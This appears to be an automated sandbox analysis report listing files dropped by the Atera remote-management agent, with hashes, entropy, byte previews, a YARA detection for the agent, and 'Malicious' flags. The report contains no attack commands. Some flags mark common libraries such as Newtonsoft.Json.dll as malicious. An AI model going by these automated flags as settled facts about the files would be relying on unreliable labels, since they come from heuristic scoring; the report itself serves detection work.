                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):541
                                                                                                                                                                                                                                        Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                        SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                        SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                        SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXWl:WBQ
                                                                                                                                                                                                                                        MD5:3D66AE5ED06891E8CE75A39A24070844
                                                                                                                                                                                                                                        SHA1:368064119835D4376727A14706C41384446183E8
                                                                                                                                                                                                                                        SHA-256:73DBA8242FDB4DE1393B367A239F730ACA6713E6658BE69F1D8992AD26479176
                                                                                                                                                                                                                                        SHA-512:C0B61F92BB61A7BF90225D1BA5A1BEA0FC077C2481A2149663B546296421855AB3147C3A1F5372EBC920731624BC8578595C18CA9D138691C720FDCB86D03F8A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=23.4

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.180256382950937
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwht:gQUm2H5KTfOLgxFJjE50vksVUfPvC6
                                                                                                                                                                                                                                        MD5:EBBE06F612E1C8B87E3D4AACA15A29B5
                                                                                                                                                                                                                                        SHA1:D2B1317ED96EC0C92CCAF7E85F68EE24F289413F
                                                                                                                                                                                                                                        SHA-256:6CD16DCE27E724C2DAA098F131343FFDBBED0DA5B7EF62542B421A0817DE3A3E
                                                                                                                                                                                                                                        SHA-512:EB079EB409925516118DB4980BE734A645B7444BC51862CE7C95D52E0697B7B937BBACAF421FC5AF1A01D3262C1B19A3CF9376ADB0A5537DE0973E0B7DDE63DF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................Rm....`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960782910515381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:PBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUJ:PBjk38WuBcAbwoA/BkjSHXP36RMG8
                                                                                                                                                                                                                                        MD5:3B395830460C2F72BC6CD12DD096DB0C
                                                                                                                                                                                                                                        SHA1:73063C63D2B562310AF76ABEF2A8B7E697389C94
                                                                                                                                                                                                                                        SHA-256:F7BB07B7C1718DBBCB692AA4296EBEFD7CCD1E55F27BE00703A3CE623AD38D5B
                                                                                                                                                                                                                                        SHA-512:DBCAEDDDC4D99586F1E04FDA97E1C706FBC6BE7BB766E0FE73ADDAD3116517010A3C1C92D7F54D71533B4C4459631966D8D0CF370ECF1F789F7D25FCB2F5A64E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\lh.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                        Entropy (8bit):4.967149133128097
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:YhKSLJf2B4VXxoRxIGUEoJtFHHTOVWTReTL14n:Y5fVXMAHHKVWde/Kn
                                                                                                                                                                                                                                        MD5:98EFD57F92F71B4F23ABA1A9EAB253E5
                                                                                                                                                                                                                                        SHA1:327AA1F415B1958F15F457C744BBDDFB7D90CD92
                                                                                                                                                                                                                                        SHA-256:DD66E890A169C6D4998A1F137B50BF4B86E7FA9F216666A0D42009430C8DEEF7
                                                                                                                                                                                                                                        SHA-512:3580CEA380863242350EECA888E68F858E331508E68421E5D8C18A24AECF682A32DFF62C141DEF71E828E4752BBB941A8FAE8701D90134F15BCEDFC6E07637D6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{"DownloadedAt":"2024-10-04T14:29:18.4770287-04:00","Hash":"8TVvf703UCtSnZvNZD+3qw=="}

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):88
                                                                                                                                                                                                                                        Entropy (8bit):4.907414261987695
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:APgXzQfUbKSoE6LGKWqKRLXsmfWoVUgXAQJ:AP5UdZlKWqKRLX/qK
                                                                                                                                                                                                                                        MD5:2486139DE82BF7BF94E4FD428191FF51
                                                                                                                                                                                                                                        SHA1:7D91EE878A89FCB2FE4F1C542CFB9B16C862F097
                                                                                                                                                                                                                                        SHA-256:59731FAB643F8E544C519622E855FB5A9A4AEEEA3FC304DE5C1DAE153E6E217A
                                                                                                                                                                                                                                        SHA-512:89BBFA8E15B46D0E2FC7F454A0FDAEB366F6ACF83DA0A5802F426759D30B6A77483DFB2D2EAFA8FC1556C3E5D6E12CC603F0530F71A14E1B1DDCF7566657B590
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..02/10/2024 11:19:51 Downloading installation to: C:\Windows\TEMP\SplashtopStreamer.exe

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):637958
                                                                                                                                                                                                                                        Entropy (8bit):7.999354686674398
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:HVd5b8dhfpvZ3U9ygocoFAdF4r0el92pBW/wFIlzxDFBLXJ:HFbyhfVsySoKdF6D2pswmlpXd
                                                                                                                                                                                                                                        MD5:767D5DD4AD2D6A3E0FF3E45DB47A9657
                                                                                                                                                                                                                                        SHA1:982A2AF2C94AE33CFB240A30A1C6433E5E5689DF
                                                                                                                                                                                                                                        SHA-256:156218F309CAF003096CB28C2FFCD74A0989E4FD0207E485A3292A4D8D1C48ED
                                                                                                                                                                                                                                        SHA-512:E8104B3622BF07059131F3F0A8DC9EA44C7B0E32213F534AEAE229F000B01425B72955197DC776F1B5750FAE2BEAAE888A2EA1D62B1630D3FC5D79B4C57317D2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......5.X..j.........3...AgentPackageSystemTools/AgentPackageSystemTools.exe....0........j.........)+{rh....k_....z.OZ..@bN...#....<...-...H\.\...>.w. .%.3@..x.......L].HQ..<b.. u k..<..;Q.Cc..~...D...f.."Ma.....1&6...Q...&.o.X...r..1.E.I.:.N.g>_.d1.v....a.Q%..vr.d.q.&....w.6.|......h.'o.f.9GV.g .ac.u.Y.o.......sw......*/`.._h....v...0....C.z.."vU@..m.....i...,....-.x....N.,.36`.#k/h......=.`...H...]....&.....6F....wNH.......W,.[?.<;n..J.i....xX...~(..kqV:Z.k.U.$U...h.v..".....Vx....F.[z.....j.._8.M^).E0.D.........B .\0H..v..p.-9..'...Y...=.[....ja{`..*&......9:....C.....sz+|..JQ.../....D?./y..`)T.%.......<nc..w#.......7t.#...A...>t....@..!A45Y2....Y.......38..c..sR......E...7....\.....I..M.....V..IXG=.a..}..H...r..eF......>.{.FFM.A.bm.!b......-.....Wk..z..P..An...D.M]RN...I.).h....].AU\.6d..u.;-..7....g.*....M..[.?..%....d..wZm0#...=......d".Eu......5.>.....$..b..n..V{...a..$..l..|....~:.s....H."....K.lK.y.|..ga.0f.C.."AQCu_.......?N....K..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51248
                                                                                                                                                                                                                                        Entropy (8bit):6.297269575035048
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:MNb66jeKAdzF2a11sxKN/NEQDg8vM2j7HxqW:MQ6jeKAd5b1S2/NPBU2jR
                                                                                                                                                                                                                                        MD5:26E9CCE4BD85A1FCACBF03A8C3F3DDCA
                                                                                                                                                                                                                                        SHA1:3F78C454CC72D4C5B2A0F295530391904EC87948
                                                                                                                                                                                                                                        SHA-256:50F399A3867DEAB18530F8F3E72D489A15F62D6E250F4F795C7BB735F9522899
                                                                                                                                                                                                                                        SHA-512:D57C6A799C01A3F67AFB3DDEDDDBD49ECFC17C2347BEC24ED85207A846547F6288D2023961EDCAB67DFC512E0B1DA187C475A7D01BB1005A61D337EC4FEA0FE0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..f.........."...0.............~.... ........@.. ....................................`.................................,...O.......`...............0(........................................................... ............... ..H............text........ ...................... ..`.rsrc...`...........................@..@.reloc..............................@..B................`.......H.......pB...p...........................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o......s....%.o........o......s...........s....%......io....%o......o........o ...o .....(!...*..0..........r...p... .....r...p.(.....o......(.....o.......("..........s......[o......s....%.o........o#.......s$..........s.......i.J.....%......io%.......o ...o ...(.........o&...*..('...*...0..].........~(....~(....~(........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):973
                                                                                                                                                                                                                                        Entropy (8bit):5.01886272205883
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsVPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3s77O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                        MD5:3CCA9B00717A374829CA50C82C1E70CF
                                                                                                                                                                                                                                        SHA1:357729D1CBFA36318D8A91BDC8C039E254A7CAA2
                                                                                                                                                                                                                                        SHA-256:4161C6070CDBCB94718A6E76931AE38CABEBB70E5B00C55E799E72E61F0ECAEC
                                                                                                                                                                                                                                        SHA-512:C172CF13115FC724799C50218F00A1055FA84DEC6B9FA28F7C981DE94D4DE64CDC7797E903D4E8B87CA2FAC535B62EB395E372656183C75F42E7086598C3C435
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXTLd:WBTp
                                                                                                                                                                                                                                        MD5:B1DE0EF19266A86B8F7A2BCD03ECD23B
                                                                                                                                                                                                                                        SHA1:AB91C344BFECEF0CDB73119D4C5C72BAA8CD21E7
                                                                                                                                                                                                                                        SHA-256:50578EB887B529FB77AFAA4F3A888ECA57E2D640F4789BBEE470F1EFF04DEB7F
                                                                                                                                                                                                                                        SHA-512:656C69FF2C62F2704AC409AA3B04CB78B9767FE908BD0BE4C6977A469B68D7C5F83B786EE915BECF5244E70892A48A92B9D0CA9A767EA329B63A6EAD98F9F274
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=26.8

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190977882973481
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:VPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87Hxo:V2bYbYSWd85I5sSakFQhHL8i
                                                                                                                                                                                                                                        MD5:6C0E7E9151E242E401EEBBC13558E3F5
                                                                                                                                                                                                                                        SHA1:9A5963712AD9E0F336A4749E7C258A67EF6260FA
                                                                                                                                                                                                                                        SHA-256:77D6B8CB94B6CF5B399704C3CD5877211D99FCCA58F94D120998FC41185D0E0F
                                                                                                                                                                                                                                        SHA-512:02E5E5FA52BDA5CFF5181196C6A62913FA87D6675CBA27FBFF3D0C50F305BA4CF8D9D8C4016EDC90AB1513BA39D89B50566BFF4D05585583EF03B8AA17BEA793
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ....................................`.................................`}..O.......8............h..0(..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.857474166817892
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:w9c52LPirPW94/DNyb8E9VF6IYinAM+oCOX3lq:w9cym2KEpYinAMxCg3c
                                                                                                                                                                                                                                        MD5:E1AA9E74F8E36783187BA548C26A1D95
                                                                                                                                                                                                                                        SHA1:52FD9D58877986DCDDBDC5C1DAC6825C5720A4F1
                                                                                                                                                                                                                                        SHA-256:CE46D831129B265740E521A614DE1F2BEE211F350FFC9643407C75308E1DBE06
                                                                                                                                                                                                                                        SHA-512:B2D79FD01D4D0BC3CCFFCD62ADD4BC45BB25561892CD23299163EDA10896249F53FD966015B7655C209B33EE413C10565D51861298061E3886B43E77E59ABDB2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f.........."...0..............-... ...@....@.. ....................................`..................................,..O....@..................0(...`.......+............................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........!..$............................................................0../.......................(....}......(....&(.....{....Y*..0..D.......................(....}......(....-.(.......(....s....z(.....{....Yn*..(....*.0..t.......r...pr...p...s......o.... ....(.....s......o....&s......(....vl(....o......o.....!..(....&..(....o....&.o......&...*......S..o........7..R.!....BSJB............v4.0.30319......l...T...#~..........#Strings....\...4...#US.........#GUID...........#Blo

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):542
                                                                                                                                                                                                                                        Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                        SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
                                                                                                                                                                                                                                        SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                        SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.134467211026903
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:WjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvH:W+e55LgIkTmyAAfTnMLvH
                                                                                                                                                                                                                                        MD5:6C03B5CEC0E3BFF6410B020CAC7EC662
                                                                                                                                                                                                                                        SHA1:DE5C6B33A97BBF0B3063CF44DACE307FEB968BF6
                                                                                                                                                                                                                                        SHA-256:05C2739F2AFA9A05514CD75C12BE6C0CD73A8356A28B3FAF84140FEEE416F339
                                                                                                                                                                                                                                        SHA-512:06900ACBA446F813E8181E42A0713B5BBD568068960DD0620C4EDF0F3C096E4C8B409181AC8FC51A24F638E37F908B6212E22DB3799107B51578B6853A8E60C0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`......u.....`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960755198774021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:eBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUj:eBjk38WuBcAbwoA/BkjSHXP36RMGi
                                                                                                                                                                                                                                        MD5:FA365D16F9EB02769CE0ACF75C31C832
                                                                                                                                                                                                                                        SHA1:F83D3F502E92DAD01574D16FDE5E7CA81C53A5DB
                                                                                                                                                                                                                                        SHA-256:63A690F6523922CB55B065764ABA61BE69F11AA93C8437C01485BCC4AC182F46
                                                                                                                                                                                                                                        SHA-512:E26E077C0C5806B3D4E1ABBB06087D08921CF6A46FA700343AA373213180BF9EABD7822CE418E24973909A515BA5B73DD0902402020E5A4AC56D387E378C4AD8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......n.....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18480
                                                                                                                                                                                                                                        Entropy (8bit):6.708180254980656
                                                                                                                                                                                                                                        Encrypted:false
